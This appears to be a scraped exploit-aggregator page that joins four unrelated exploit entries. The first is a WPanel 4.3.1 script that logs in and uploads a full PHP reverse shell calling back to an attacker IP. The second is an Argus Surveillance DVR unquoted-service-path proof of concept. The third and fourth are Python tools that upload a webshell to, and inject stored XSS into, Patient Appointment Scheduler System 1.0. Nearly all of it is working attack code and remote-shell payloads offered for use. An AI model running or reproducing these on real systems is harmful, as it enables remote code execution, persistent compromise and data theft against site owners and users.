# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated) # Date: 07/06/2021 # Exploit Author: Sentinal920 # Vendor Homepage: https://github.com/wpanel # Software Link: https://github.com/wpanel/wpanel4-cms # Version: 4.3.1 # Tested on: Linux import requests import random,string # Change This ################################### url = 'http://192.168.182.134:8080' email = 'admin@localhost.com' password = 'admin' ################################### # PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php # Works on linux/windows/mac ########################################################################### # Make sure to change lhost and lport in the reverse shell below (Line 223) ########################################################################### # Get_Cookies r = requests.get(url) r2 = requests.get(url,cookies=r.cookies) cookie = r2.cookies['wpanel_csrf_cookie'] name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9)) payload = ''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="wpanel_csrf_token" '''+cookie+''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="titulo" '''+name+''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="descricao" '''+name+''' -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="tags" tesad -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="userfile"; filename="php-reverse-shell.php" Content-Type: application/x-php <?php class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $options = array(); // proc_open() options private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function __construct($addr, $port) { $this->addr = $addr; $this->port = $port; } private function detect() { $detected = true; if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; $this->options['bypass_shell'] = true; // we do not want a shell within a shell } else { $detected = false; echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n"; } return $detected; } private function daemonize() { $exit = false; if (!function_exists('pcntl_fork')) { echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n"; } else if (($pid = @pcntl_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n"; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n"; } else if (posix_setsid() < 0) { // once daemonized you will actually no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n"; } else { echo "DAEMONIZE: Completed successfully!\n"; } return $exit; } private function settings() { @error_reporting(0); @set_time_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str_replace('<', '<', $data); $data = str_replace('>', '>', $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length $this->dump($data); // script's dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $size = fstat($input)['size']; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; $this->dump($data); // script's dump } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC_ERROR: {$errno}: {$errstr}\n"; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options); if (!$process) { echo "PROC_ERROR: Cannot start the shell\n"; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- @fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n"); do { if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC_ERROR: Shell connection has been terminated\n"; break; } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo "STRM_ERROR: stream_select() failed\n"; break; } else if ($num_changed_streams > 0) { if ($this->os === 'LINUX') { if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } while (!$this->error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.182.136', 9000); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo '</pre>'; ?> -----------------------------45668787242378192391383974033 Content-Disposition: form-data; name="status" 1 -----------------------------45668787242378192391383974033-- ''' data = 'wpanel_csrf_token='+cookie+'&email='+email+'&password='+password headers = {'Content-Type': 'application/x-www-form-urlencoded'} # Login_as_admin r3 = requests.post(url+'/index.php/admin/login',cookies=r.cookies,headers=headers,data=data) def exploit_gallery(): # Adding_Reverse_Shell headers2 = {'Content-Type': 'multipart/form-data; boundary=---------------------------45668787242378192391383974033'} r4 = requests.post(url + '/index.php/admin/galleries/add',cookies=r.cookies,headers=headers2,data=payload) print('') print('Shell Uploaded as: '+name) print('') print('Visit: '+url+'/index.php/admin/galleries') print('OR') print('Visit: '+url+'/index.php/galleries') print('') exploit_gallery() #def exploit_post(): #def exloit_pages(): #def dashboard_avatar_image():
HireHackking

Argus Surveillance DVR 4.0 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 03.09.2021 # Version: Argus Surveillance DVR 4.0 # Tested on: Windows 10 # Note: "Start as service on Windows Startup" must be enabled in Program Options # Proof of Concept: C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Argus Surveillance DVR Watchdog DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Argus Surveillance DVR Watchdog ARGUSSURVEILLANCEDVR_WATCHDOG C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe Auto
HireHackking
# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload # Date: 03/09/2021 # Exploit Author: a-rey # Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14928 # Version: v1.0 # Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import time import logging import requests import argparse BANNER = """ ╔═════════════════════════════════════════════════════════════════════════════════════════════════╗ ║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║ ╚═════════════════════════════════════════════════════════════════════════════════════════════════╝ by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m """ def exploit(url:str, file:str, delay:int) -> None: if not os.path.exists(file): logging.error(f'webshell payload "{file}"" does not exist?') return logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...') uploadTime = int(time.time()) r = requests.post(url + '/classes/SystemSettings.php', files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous params={'f' : 'update_settings'}, verify=False ) if not r.ok: logging.error('HTTP upload request failed') return logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...') for i in range(uploadTime - delay, uploadTime + delay + 1): r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False) logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...') # NOTE: website will send redirects for all files that do not exist if r.status_code != 302: logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}') return logging.error('failed to find payload on target') logging.warning('maybe need a larger delay or uploads directory is not writable?') return if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-u', '--url', help='website URL', type=str, required=True) parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True) parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60) parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.url, args.payload, args.delay)
HireHackking
# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS # Date: 03/09/2021 # Exploit Author: a-rey # Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14928 # Version: v1.0 # Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import logging import requests import argparse BANNER = """ ╔═══════════════════════════════════════════════════════════════════╗ ║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║ ╚═══════════════════════════════════════════════════════════════════╝ by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m """ def exploit(url:str, file:str) -> None: if not os.path.exists(file): logging.error(f'{file} does not exist?') return logging.info(f'reading {file} for XSS content ...') with open(file, 'r') as f: xssPayload = f.read() logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...') r = requests.post(url + '/classes/SystemSettings.php', data={'about_us' : xssPayload}, params={'f' : 'update_settings'}, verify=False ) if not r.ok: logging.error('HTTP request failed') return logging.info('checking for XSS payload on main page ...') r = requests.get(url) if xssPayload not in r.text: logging.error(f'XSS injection failed? received: {r.text}') logging.warning('maybe about.html is not writable?') return logging.success('XSS payload found on target website') return if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-u', '--url', help='website URL', type=str, required=True) parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True) parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.url, args.file)